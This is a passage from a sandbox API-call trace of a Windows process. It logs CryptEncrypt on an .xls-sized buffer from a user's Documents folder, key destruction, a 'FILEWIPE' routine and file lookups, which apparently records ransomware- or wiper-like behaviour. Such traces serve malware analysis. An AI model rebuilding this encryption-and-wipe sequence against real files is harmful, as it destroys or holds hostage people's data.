pdwDataLen=0x87e820*=0xfe17, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xfe20) returned 1 [0173.936] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.936] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.936] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.936] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.937] CharLowerBuffW (in: lpsz="byte[65057]", cchLength=0xb | out: lpsz="byte[65057]") returned 0xb [0173.937] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.938] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.938] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.938] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.938] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.938] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9e51d8*, pdwDataLen=0x87e820*=0xfe17, dwBufLen=0xfe20 | out: pbData=0x9e51d8*, pdwDataLen=0x87e820*=0xfe20) returned 1 [0173.939] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.939] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.939] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.939] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.939] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.939] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.939] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0173.939] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.939] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0173.939] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.939] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.939] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.939] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.939] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0173.940] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.940] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.940] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.944] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.944] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.944] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.949] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.949] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.949] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0173.949] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0173.949] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.949] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0173.949] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.950] CryptDestroyKey (hKey=0x90af98) returned 1 [0173.950] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0173.950] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0173.950] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0173.950] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0173.950] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0173.950] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0173.950] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0173.950] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0173.950] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.950] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0173.950] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0173.950] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0173.950] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0173.950] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0173.950] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.950] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0173.950] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.950] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0173.951] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.951] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.951] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.951] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.951] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0173.951] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.951] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.951] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0173.951] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0173.951] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0173.951] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.951] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0173.951] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.951] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.951] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0173.951] FreeLibrary (hLibModule=0x74f20000) returned 1 [0173.951] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.951] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.951] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.954] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.955] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.955] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.955] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0173.955] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.957] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.957] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f6963d0, ftCreationTime.dwHighDateTime=0x1d5e41e, ftLastAccessTime.dwLowDateTime=0x20c90830, ftLastAccessTime.dwHighDateTime=0x1d5dc39, ftLastWriteTime.dwLowDateTime=0x20c90830, ftLastWriteTime.dwHighDateTime=0x1d5dc39, nFileSizeHigh=0x0, nFileSizeLow=0xfe17, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="mV3Nzu4vWV4hC.xls", cAlternateFileName="MV3NZU~1.XLS")) returned 0x90ae18 [0173.957] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0173.958] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0173.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0173.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0173.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0173.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0173.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0173.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0173.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0173.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0173.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0173.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0173.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0173.958] CharLowerBuffW (in: lpsz="byte[65047]", cchLength=0xb | out: lpsz="byte[65047]") returned 0xb [0173.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0173.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0173.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0173.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0173.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0173.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0173.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0173.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0173.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.960] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0173.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0173.960] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0173.960] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0173.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0173.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0173.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0173.960] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0173.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0173.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0173.961] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0173.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0173.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0173.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0173.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2658 [0173.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2658, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0173.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0173.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0173.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0173.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0173.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0173.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0173.961] FreeLibrary (hLibModule=0x75c90000) returned 1 [0173.961] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0173.961] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.962] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0173.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0173.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0173.962] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0173.962] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0173.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0173.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0173.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0173.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0173.962] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0173.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0173.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0173.962] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0173.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0173.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0173.962] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0173.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0173.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0173.963] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0173.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0173.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0173.963] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0173.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0173.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0173.963] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0173.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0173.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0173.963] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.963] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.963] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.980] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.980] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.980] RtlAllocateHeap (HeapHandle=0x8a0000, 